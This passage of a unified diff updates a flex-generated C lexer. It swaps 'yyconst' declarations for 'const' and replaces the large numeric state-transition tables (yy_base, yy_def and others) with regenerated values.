++ 0, 0, 0, 0, 0, 116, 116, 116, 116, 116, ++ 94, 116, 116, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ ++ 0, 144, 0, 0, 0, 0, 0, 131, 0, 0, ++ 0, 0, 116, 103, 116, 116, 116, 116, 101, 146, ++ 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, ++ 0, 8, 9, 0, 0, 0, 0, 0, 0, 22, ++ 0, 0, 0, 142, 0, 0, 116, 116, 116, 100, ++ 116, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 10, 0, 0, 135, 0, 130, 0, 0, 0, ++ 0, 0, 116, 116, 88, 116, 0, 0, 150, 0, ++ 0, 0, 0, 0, 126, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 116, 116, 99, 0, 0, ++ ++ 0, 0, 5, 0, 0, 0, 0, 128, 0, 133, ++ 0, 0, 0, 143, 0, 116, 116, 151, 148, 0, ++ 147, 125, 0, 0, 0, 0, 0, 0, 137, 165, ++ 116, 116, 149, 0, 0, 0, 156, 0, 0, 116, ++ 116, 127, 0, 0, 0, 132, 102, 116, 6, 0, ++ 134, 116, 0, 116, 0, 116, 7, 116, 104, 0 + } ; + +-static yyconst flex_int32_t yy_ec[256] = ++static const YY_CHAR yy_ec[256] = + { 0, + 1, 1, 1, 1, 1, 1, 1, 1, 2, 3, + 1, 1, 4, 1, 1, 1, 1, 1, 1, 1, +@@ -542,7 +535,7 @@ static yyconst flex_int32_t yy_ec[256] = + 1, 1, 1, 1, 1 + } ; + +-static yyconst flex_int32_t yy_meta[71] = ++static const YY_CHAR yy_meta[71] = + { 0, + 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, + 1, 3, 3, 3, 4, 4, 1, 4, 4, 4, +@@ -553,614 +546,629 @@ static yyconst flex_int32_t yy_meta[71] + 3, 3, 3, 3, 3, 3, 3, 3, 3, 1 + } ; + +-static yyconst flex_int16_t yy_base[1243] = ++static const flex_int16_t yy_base[1269] = + { 0, +- 0, 69, 2841, 70, 71, 74, 76, 76, 2835, 81, +- 2842, 2845, 2845, 2845, 74, 83, 78, 88, 78, 129, +- 2774, 2823, 83, 95, 98, 103, 107, 135, 141, 147, +- 156, 150, 159, 163, 169, 185, 203, 208, 212, 218, +- 223, 2769, 144, 260, 2845, 2845, 172, 2816, 2845, 2845, +- 2823, 2845, 227, 230, 238, 288, 292, 299, 296, 303, +- 306, 311, 241, 314, 317, 323, 350, 326, 369, 184, +- 2814, 2845, 201, 2813, 121, 2845, 2831, 216, 2845, 90, +- 2766, 175, 250, 375, 192, 2845, 0, 379, 394, 2845, +- 2845, 0, 2845, 336, 402, 408, 420, 423, 426, 429, +- +- 433, 436, 442, 445, 448, 451, 454, 457, 464, 467, +- 471, 474, 480, 483, 489, 498, 502, 505, 517, 522, +- 
525, 531, 537, 540, 547, 2845, 232, 0, 321, 2806, +- 154, 64, 134, 253, 225, 2777, 489, 2776, 518, 2769, +- 511, 2782, 2777, 179, 2768, 2771, 366, 2802, 2765, 2845, +- 561, 567, 570, 576, 583, 589, 592, 595, 598, 601, +- 606, 610, 615, 623, 626, 629, 632, 639, 635, 644, +- 648, 390, 2800, 2754, 406, 2798, 207, 648, 366, 665, +- 511, 0, 688, 141, 670, 0, 661, 693, 675, 700, +- 703, 711, 714, 718, 721, 728, 731, 734, 737, 740, +- +- 745, 748, 754, 757, 773, 776, 782, 787, 790, 793, +- 796, 799, 804, 807, 811, 815, 821, 825, 834, 838, +- 2793, 2770, 2754, 297, 2757, 717, 2764, 2766, 2764, 794, +- 2766, 2753, 191, 2747, 2760, 2845, 2748, 345, 2759, 311, +- 2743, 2756, 2741, 2755, 34, 2740, 439, 2747, 2737, 2742, +- 2738, 2743, 2735, 2746, 855, 858, 864, 867, 873, 877, +- 880, 883, 886, 889, 892, 898, 901, 908, 912, 915, +- 918, 931, 934, 923, 2745, 941, 946, 951, 958, 962, +- 974, 977, 986, 989, 992, 1000, 1003, 1006, 1009, 1012, +- 1015, 1018, 1021, 1024, 1027, 1030, 1033, 1036, 1040, 1049, +- +- 1052, 1062, 1079, 1083, 1088, 1091, 1094, 1097, 1105, 1108, +- 1111, 2845, 2743, 2733, 2741, 2740, 2740, 2728, 362, 2719, +- 2740, 2723, 2845, 2734, 2724, 2721, 2718, 2734, 2723, 2717, +- 2757, 2726, 2716, 2718, 2710, 2709, 2721, 2720, 2709, 2715, +- 2703, 2712, 2710, 2701, 2711, 2699, 1051, 2701, 2698, 2739, +- 2708, 2707, 2693, 2692, 2845, 1116, 1119, 1122, 1128, 1132, +- 1138, 1143, 1146, 1149, 1162, 1166, 1173, 1176, 1180, 1185, +- 1191, 1199, 1202, 2845, 1205, 1209, 1219, 1215, 1230, 1225, +- 1239, 1246, 1257, 1260, 1264, 1267, 1270, 1273, 1276, 1279, +- 1282, 1285, 1289, 1292, 1295, 1301, 1304, 1307, 1310, 1313, +- +- 1316, 1326, 1334, 1340, 1343, 1347, 2692, 2720, 2689, 2695, +- 2686, 2690, 2689, 2697, 2692, 2681, 2681, 2683, 2681, 2695, +- 2676, 2683, 2688, 2691, 2677, 2704, 2673, 2669, 2678, 2685, +- 2672, 2678, 2678, 2668, 2670, 2666, 2668, 2672, 2668, 2695, +- 2662, 2669, 2650, 2667, 2666, 2656, 2658, 546, 536, 2649, +- 1351, 1356, 1359, 1366, 1369, 1373, 1381, 
1387, 1392, 1395, +- 1398, 1401, 1404, 1411, 1416, 1423, 1426, 1429, 1433, 1442, +- 1439, 1471, 1474, 1477, 1480, 1483, 1487, 1498, 1501, 1504, +- 1507, 1510, 1513, 1516, 1519, 1522, 1525, 1533, 1536, 1539, +- 1543, 1549, 2650, 2643, 1545, 2660, 2653, 2646, 2651, 2645, +- +- 2647, 2648, 2642, 2639, 2638, 2652, 2638, 2644, 2651, 2631, +- 2646, 2648, 2630, 2643, 2645, 2632, 2627, 2634, 2638, 2637, +- 2635, 2626, 2633, 2623, 2623, 2622, 2625, 2615, 2614, 2615, +- 2655, 2625, 2619, 2613, 363, 2612, 2611, 2623, 1554, 1559, +- 1564, 1570, 1579, 1588, 1591, 1597, 1601, 1604, 1607, 1612, +- 1617, 1620, 1623, 1635, 1643, 1646, 1649, 1657, 1663, 1668, +- 1678, 1681, 1684, 1687, 1690, 1696, 1700, 1703, 1712, 1715, +- 1718, 1722, 1725, 1728, 1732, 1735, 1738, 1741, 2648, 2636, +- 2602, 2612, 2614, 2613, 2601, 2615, 2610, 2605, 2604, 2594, +- 2604, 2592, 2600, 2599, 2602, 2588, 2600, 2587, 2587, 2597, +- +- 2596, 2588, 2845, 2594, 2587, 2594, 2591, 2584, 2602, 2618, +- 567, 2591, 2616, 2574, 2845, 2580, 2570, 2579, 2578, 2567, +- 2570, 2578, 2569, 2577, 2579, 2566, 2574, 2560, 2565, 1744, +- 1749, 1755, 1767, 1761, 1773, 1776, 1779, 1782, 1785, 1789, +- 1801, 1804, 1808, 1812, 1815, 1833, 1836, 1845, 1851, 1854, +- 1857, 1860, 1863, 1870, 1874, 1882, 1886, 1889, 1892, 1897, +- 1900, 1903, 1906, 2561, 2573, 2565, 2547, 2546, 2539, 2536, +- 2527, 2845, 2525, 2538, 593, 2845, 1313, 2528, 2526, 2535, +- 2845, 2845, 2537, 2562, 2520, 2845, 2530, 2845, 2525, 2528, +- 2845, 2527, 2506, 2514, 2513, 2521, 2514, 2510, 2511, 2503, +- +- 2511, 2505, 2504, 2493, 2511, 2845, 2509, 2508, 2508, 2493, +- 2505, 2491, 680, 1909, 1912, 1916, 1919, 1922, 1925, 1931, +- 1934, 1938, 1944, 1954, 1957, 1960, 1963, 1966, 1969, 1973, +- 1978, 1987, 1993, 2004, 2009, 2012, 2015, 2022, 2025, 2028, +- 2035, 2040, 2504, 2494, 2492, 2480, 2487, 2515, 2465, 2466, +- 2465, 2458, 2438, 2439, 2388, 2388, 2393, 2377, 2387, 2379, +- 837, 2373, 2373, 2368, 2367, 2362, 2399, 2845, 2334, 2340, +- 2338, 2340, 2336, 
2311, 2297, 2291, 2297, 2293, 2268, 2845, +- 2268, 2845, 2845, 2259, 2286, 2845, 2277, 2255, 2239, 2043, +- 2049, 2052, 2055, 2058, 2062, 2065, 2068, 2071, 2077, 2080, +- +- 2083, 2086, 2095, 2099, 2110, 2113, 2116, 2124, 2127, 2130, +- 2137, 2140, 2143, 2245, 2243, 2242, 2241, 2233, 2188, 2196, +- 2225, 2213, 2163, 2166, 231, 2175, 2174, 2157, 2145, 2845, +- 2845, 2145, 2152, 2123, 2136, 2127, 2118, 2107, 2119, 2087, +- 2095, 2084, 2083, 2082, 2062, 2067, 2845, 2069, 2049, 2083, +- 2067, 2845, 2025, 2000, 2000, 673, 1989, 2146, 2150, 2158, +- 2161, 2165, 2169, 2172, 2175, 2180, 2184, 2187, 2195, 2198, +- 2204, 2216, 2219, 2222, 2225, 2228, 2845, 2845, 1983, 1979, +- 1966, 1955, 1995, 1948, 1949, 1953, 1945, 1933, 1928, 1932, +- 1934, 1918, 1913, 1913, 1914, 1894, 1894, 1891, 1920, 1861, +- +- 1828, 1840, 2845, 2845, 2845, 1829, 1813, 2845, 1804, 1800, +- 1793, 1792, 1820, 1790, 1789, 1780, 1786, 1774, 2237, 2242, +- 2245, 2250, 2253, 2256, 2259, 2262, 2265, 2268, 2271, 2274, +- 2277, 2285, 1811, 1779, 1768, 1752, 1744, 1756, 1756, 1755, +- 1746, 1735, 1717, 1708, 1721, 1702, 1703, 2845, 1710, 1672, +- 1662, 2845, 1659, 1657, 1634, 1636, 1624, 1617, 1618, 1604, +- 1616, 1605, 1592, 1600, 1589, 1624, 1589, 1578, 2299, 2303, +- 2308, 2311, 2315, 2318, 2321, 2324, 2327, 2335, 1579, 1571, +- 1556, 1543, 1547, 1546, 1531, 1564, 1522, 1568, 1536, 1518, +- 1520, 1501, 1496, 1508, 1518, 1522, 1491, 1458, 1448, 2845, +- +- 1485, 1440, 1440, 1435, 1430, 1427, 1427, 2845, 1409, 1410, +- 1418, 1441, 2338, 2341, 2344, 2352, 2357, 2362, 2365, 2368, +- 1411, 1409, 1383, 1411, 1375, 1370, 1363, 1344, 1337, 1340, +- 1371, 1336, 1330, 1317, 1307, 1313, 1312, 1285, 1291, 2845, +- 1274, 1272, 1262, 1254, 1204, 2845, 2845, 1214, 1214, 1212, +- 1193, 1203, 2371, 2379, 2384, 2387, 2391, 2398, 2394, 1198, +- 1174, 1159, 1150, 1158, 1145, 1151, 1151, 1145, 1145, 1123, +- 1123, 1125, 1121, 1110, 1148, 1109, 1116, 2845, 1144, 1104, +- 1098, 1084, 1084, 2845, 1087, 1076, 1095, 78, 2401, 2404, 
+- 2409, 2414, 2421, 2438, 2845, 175, 207, 199, 199, 268, +- +- 2845, 250, 302, 271, 294, 307, 2845, 2845, 310, 392, +- 389, 423, 415, 440, 2845, 445, 448, 488, 2845, 467, +- 483, 2441, 2444, 2447, 2450, 496, 517, 541, 579, 562, +- 569, 574, 606, 619, 756, 2845, 633, 671, 2845, 648, +- 2845, 649, 660, 678, 706, 707, 2453, 2456, 2459, 2462, +- 723, 732, 2845, 723, 742, 764, 777, 810, 2845, 772, +- 787, 794, 790, 803, 797, 840, 824, 832, 857, 2467, +- 2470, 2473, 866, 868, 884, 890, 2845, 891, 891, 893, +- 907, 2845, 917, 2845, 957, 919, 930, 2845, 922, 2480, +- 2476, 2845, 2845, 934, 2845, 2845, 944, 938, 938, 961, +- +- 998, 1009, 2845, 2845, 2483, 2489, 2845, 1017, 1023, 1025, +- 2845, 1023, 1029, 2494, 2498, 2845, 1019, 1022, 1038, 2845, +- 2506, 2509, 2845, 1025, 2845, 2513, 1037, 2519, 1062, 2526, +- 2845, 2533, 2536, 2845, 2594, 2598, 2602, 2606, 2608, 2610, +- 2614, 1109 ++ 0, 69, 2946, 70, 71, 74, 76, 76, 2940, 81, ++ 2947, 2950, 2950, 2950, 74, 83, 78, 88, 78, 129, ++ 2879, 2928, 83, 95, 98, 102, 136, 141, 151, 147, ++ 156, 159, 162, 169, 175, 178, 185, 189, 204, 212, ++ 217, 220, 2874, 115, 259, 2950, 2950, 117, 2921, 2950, ++ 2950, 2928, 2950, 223, 246, 249, 287, 261, 296, 301, ++ 290, 304, 310, 313, 316, 322, 348, 353, 358, 366, ++ 375, 206, 2919, 2950, 238, 2918, 151, 2950, 2936, 244, ++ 2950, 90, 2871, 172, 361, 421, 197, 2950, 0, 398, ++ 380, 2950, 2950, 0, 2950, 387, 418, 428, 438, 442, ++ ++ 445, 448, 451, 454, 464, 467, 470, 473, 476, 479, ++ 486, 489, 493, 496, 501, 504, 507, 510, 513, 523, ++ 528, 531, 540, 545, 551, 561, 564, 568, 2950, 284, ++ 0, 273, 2911, 189, 70, 183, 291, 299, 2882, 388, ++ 2881, 335, 2874, 532, 2887, 2882, 89, 2873, 2876, 351, ++ 2907, 2870, 2950, 582, 585, 588, 594, 597, 602, 611, ++ 614, 617, 620, 623, 627, 633, 639, 642, 645, 648, ++ 652, 655, 663, 667, 677, 391, 2905, 2859, 416, 2903, ++ 197, 677, 370, 694, 390, 0, 703, 162, 699, 0, ++ 717, 720, 723, 727, 730, 743, 746, 749, 752, 755, ++ ++ 761, 764, 767, 775, 771, 
778, 781, 784, 788, 793, ++ 802, 806, 810, 815, 820, 823, 826, 829, 834, 837, ++ 847, 850, 857, 860, 864, 2898, 2875, 2859, 232, 2862, ++ 510, 2869, 2871, 2869, 284, 2871, 2858, 202, 2852, 2865, ++ 2950, 2853, 834, 2864, 303, 2848, 2861, 2846, 2860, 34, ++ 2845, 489, 2852, 2842, 2847, 2843, 2848, 2840, 2851, 867, ++ 886, 889, 893, 899, 902, 905, 909, 912, 918, 926, ++ 929, 934, 938, 942, 948, 953, 957, 960, 967, 973, ++ 2850, 976, 981, 1001, 1004, 1007, 1010, 1015, 1024, 1027, ++ 1031, 1040, 1043, 1046, 1050, 1055, 1058, 1061, 1064, 1067, ++ ++ 1070, 1073, 1076, 1082, 1088, 1094, 1097, 1108, 1118, 1121, ++ 1125, 1133, 1136, 1140, 1143, 1146, 1149, 1152, 2950, 2848, ++ 2838, 2846, 2845, 2845, 2833, 525, 2824, 2845, 2828, 2950, ++ 2839, 2829, 2826, 2823, 2839, 2828, 2822, 2862, 2831, 2821, ++ 2823, 2815, 2814, 2826, 2825, 2814, 2820, 2808, 2817, 2815, ++ 2806, 2816, 2804, 668, 2806, 2803, 2844, 2813, 2812, 2798, ++ 2797, 2950, 1161, 1164, 1170, 1173, 1178, 1184, 1188, 1191, ++ 1194, 1202, 1207, 1210, 1213, 1220, 1223, 1226, 1231, 1236, ++ 1244, 2950, 1247, 1264, 1277, 1290, 1293, 1296, 1299, 1303, ++ 1306, 1310, 1313, 1324, 1329, 1332, 1335, 1338, 1341, 1344, ++ ++ 1347, 1352, 1355, 1361, 1364, 1367, 1370, 1373, 1376, 1379, ++ 1389, 1396, 1402, 1406, 1410, 2797, 2825, 2794, 2800, 2791, ++ 2795, 2794, 2802, 2797, 2786, 2786, 2788, 2786, 2800, 2781, ++ 2788, 2793, 2796, 2782, 2809, 2778, 2774, 2783, 2790, 2777, ++ 2783, 2783, 2773, 2775, 2771, 2773, 2777, 2773, 2800, 2767, ++ 2774, 2755, 2772, 2771, 2761, 2763, 385, 233, 2754, 1414, ++ 1419, 1422, 1429, 1435, 1444, 1449, 1454, 1457, 1460, 1463, ++ 1468, 1474, 1477, 1480, 1488, 1494, 1497, 1507, 1500, 1510, ++ 1514, 1535, 1543, 1546, 1549, 1559, 1555, 1564, 1570, 1574, ++ 1577, 1580, 1583, 1586, 1589, 1592, 1595, 1598, 1601, 1607, ++ ++ 1610, 1616, 1622, 2755, 2748, 1606, 2765, 2758, 2751, 2756, ++ 2750, 2752, 2753, 2747, 2744, 2743, 2757, 2743, 2749, 2756, ++ 2736, 2751, 2753, 2735, 2748, 2750, 2737, 2732, 2739, 2743, 
++ 2742, 2740, 2731, 2738, 2728, 2728, 2727, 2730, 2720, 2719, ++ 2720, 2760, 2730, 2724, 2718, 373, 2717, 2716, 2728, 1625, ++ 1637, 1640, 1643, 1649, 1653, 1656, 1661, 1664, 1668, 1674, ++ 1677, 1680, 1683, 1696, 1702, 1705, 1708, 1712, 1715, 1723, ++ 1730, 1733, 1748, 1737, 1751, 1756, 1759, 1763, 1767, 1772, ++ 1778, 1783, 1786, 1789, 1793, 1796, 1799, 1804, 1807, 1810, ++ 1813, 2753, 2741, 2707, 2717, 2719, 2718, 2706, 2720, 2715, ++ ++ 2710, 2709, 2699, 2709, 2697, 2705, 2704, 2707, 2693, 2705, ++ 2692, 2692, 2702, 2701, 2693, 2950, 2699, 2692, 2699, 2696, ++ 2689, 2707, 2723, 536, 2696, 2721, 2679, 2950, 2685, 2675, ++ 2682, 2659, 2648, 2651, 2659, 2650, 2658, 2660, 2647, 2655, ++ 2641, 2646, 1816, 1820, 1823, 1826, 1832, 1838, 1841, 1845, ++ 1848, 1851, 1860, 1863, 1871, 1877, 1886, 1880, 1889, 1896, ++ 1893, 1901, 1916, 1920, 1923, 1926, 1929, 1932, 1943, 1951, ++ 1954, 1959, 1962, 1965, 1970, 1973, 1976, 1979, 2641, 2652, ++ 2646, 2650, 2649, 2642, 2639, 2630, 2950, 2627, 2640, 566, ++ 2950, 1158, 2630, 2628, 2637, 2950, 2950, 2638, 2663, 2621, ++ ++ 2950, 2630, 2950, 2625, 2628, 2950, 2627, 2608, 2616, 2612, ++ 2620, 2598, 2594, 2594, 2559, 2567, 2557, 2555, 2532, 2550, ++ 2950, 2547, 2546, 2545, 2529, 2541, 2507, 395, 1982, 1988, ++ 1991, 1994, 1997, 2000, 2004, 2007, 2011, 2014, 2021, 2029, ++ 2032, 2035, 2041, 2044, 2054, 2058, 2066, 2070, 2077, 2080, ++ 2092, 2096, 2099, 2102, 2110, 2113, 2116, 2061, 2123, 2520, ++ 2476, 2477, 2463, 2470, 2491, 2437, 2449, 2447, 2446, 2429, ++ 2430, 2416, 2416, 2422, 2404, 2415, 2390, 957, 2384, 2386, ++ 2357, 2349, 2347, 2387, 2950, 2334, 2344, 2342, 2338, 2335, ++ 2304, 2282, 2277, 2283, 2268, 2250, 2950, 2246, 2950, 2950, ++ ++ 2244, 2273, 2950, 2253, 2222, 2206, 2128, 2131, 2136, 2139, ++ 2142, 2145, 2150, 2153, 2156, 2162, 2165, 2170, 2173, 2184, ++ 2196, 2201, 2204, 2207, 2213, 2218, 2224, 2227, 2230, 2237, ++ 2240, 2243, 2215, 2196, 2195, 2215, 2214, 2169, 2173, 2203, ++ 2181, 2141, 2144, 433, 2153, 2151, 
2131, 2133, 2950, 2950, ++ 2130, 2138, 2113, 2126, 2123, 2121, 2100, 2100, 2079, 2082, ++ 2081, 2070, 2068, 2044, 2051, 2950, 2051, 2040, 2068, 2065, ++ 2950, 2008, 2006, 2005, 275, 2001, 2246, 2250, 2258, 2261, ++ 2264, 2269, 2272, 2275, 2278, 2285, 2288, 2291, 2298, 2302, ++ 2309, 2313, 2320, 2323, 2326, 2329, 2950, 2950, 1999, 1995, ++ ++ 1987, 1986, 2020, 1973, 1977, 1981, 1972, 1934, 1929, 1918, ++ 1902, 1914, 1908, 1905, 1905, 1890, 1889, 1876, 1904, 1877, ++ 1857, 1862, 2950, 2950, 2950, 1846, 1839, 2950, 1830, 1827, ++ 1820, 1811, 1849, 1818, 1818, 1792, 1794, 1755, 2335, 2338, ++ 2343, 2346, 2351, 2354, 2357, 2360, 2363, 2366, 2369, 2373, ++ 2376, 2384, 2388, 1768, 1736, 1731, 1716, 1694, 1706, 1706, ++ 1690, 1694, 1683, 1652, 1648, 1655, 1639, 1639, 2950, 1650, ++ 1634, 1625, 2950, 1612, 1611, 1593, 1595, 1583, 1584, 1578, ++ 1569, 1568, 1531, 1520, 1524, 1509, 1544, 1492, 1483, 2401, ++ 2404, 2409, 2412, 2415, 2418, 2421, 2424, 2427, 2430, 2438, ++ ++ 1480, 1487, 1481, 1468, 1478, 1453, 1439, 1469, 1429, 1476, ++ 1433, 1418, 1424, 1396, 1396, 1404, 1428, 1431, 1401, 1395, ++ 1385, 2950, 1420, 1374, 1375, 1383, 1362, 1361, 1357, 2950, ++ 1341, 1340, 1347, 1371, 2441, 2444, 2447, 2451, 2465, 2468, ++ 2471, 2474, 2482, 1345, 1321, 1320, 1342, 1283, 1283, 1275, ++ 1271, 1240, 1243, 1277, 1242, 1236, 1233, 1219, 1225, 1230, ++ 1224, 1231, 2950, 1221, 1215, 1223, 1224, 1205, 2950, 2950, ++ 1217, 1216, 1214, 1201, 1208, 2490, 2493, 2496, 2500, 2504, ++ 2509, 2513, 2518, 1203, 1190, 1185, 1182, 1179, 1167, 1167, ++ 1163, 1159, 1147, 1112, 1110, 1115, 1093, 1081, 1108, 1069, ++ ++ 1076, 2950, 1103, 1069, 1067, 1052, 1059, 2950, 1062, 1048, ++ 1077, 68, 2523, 2526, 2529, 2532, 2535, 2541, 2548, 2950, ++ 126, 174, 178, 226, 273, 2950, 248, 348, 376, 404, ++ 443, 2950, 2950, 446, 452, 469, 483, 512, 533, 2950, ++ 558, 558, 599, 2950, 561, 593, 2551, 2554, 2561, 2564, ++ 2567, 584, 611, 622, 653, 623, 630, 636, 635, 653, ++ 684, 2950, 664, 696, 2950, 675, 2950, 686, 
689, 689, ++ 702, 714, 2570, 2573, 2576, 2590, 722, 754, 2950, 750, ++ 761, 775, 795, 832, 2950, 795, 801, 807, 807, 825, ++ 826, 865, 842, 842, 844, 2593, 2596, 2599, 845, 858, ++ ++ 878, 878, 2950, 883, 876, 876, 892, 2950, 904, 2950, ++ 937, 899, 913, 2950, 916, 2606, 2612, 2950, 2950, 939, ++ 2950, 2950, 949, 942, 944, 953, 946, 957, 2950, 2950, ++ 2615, 2619, 2950, 958, 963, 979, 2950, 977, 980, 2623, ++ 2626, 2950, 971, 983, 997, 2950, 2629, 2633, 2950, 997, ++ 2950, 2636, 1004, 2645, 1041, 2649, 2950, 2652, 2655, 2950, ++ 2713, 2717, 2721, 2725, 2727, 2729, 2733, 1088 + } ; + +-static yyconst flex_int16_t yy_def[1243] = ++static const flex_int16_t yy_def[1269] = + { 0, +- 1234, 1, 1235, 1235, 1236, 1236, 1, 7, 1, 1, +- 1234, 1234, 1234, 1234, 1237, 1238, 1234, 1239, 1234, 1234, +- 20, 1234, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1234, +- 44, 1234, 1234, 44, 1237, 1234, 1237, 1238, 1234, 1234, +- 20, 1239, 1239, 1239, 1239, 1234, 1241, 1234, 1234, 1234, +- 1234, 1242, 1234, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1234, 1234, 44, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1234, 44, 1234, 1234, 44, 1234, 1234, 1239, 1239, +- 1239, 1241, 1234, 1234, 1234, 1242, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 
1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1234, 1239, 1239, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1234, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 
1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 
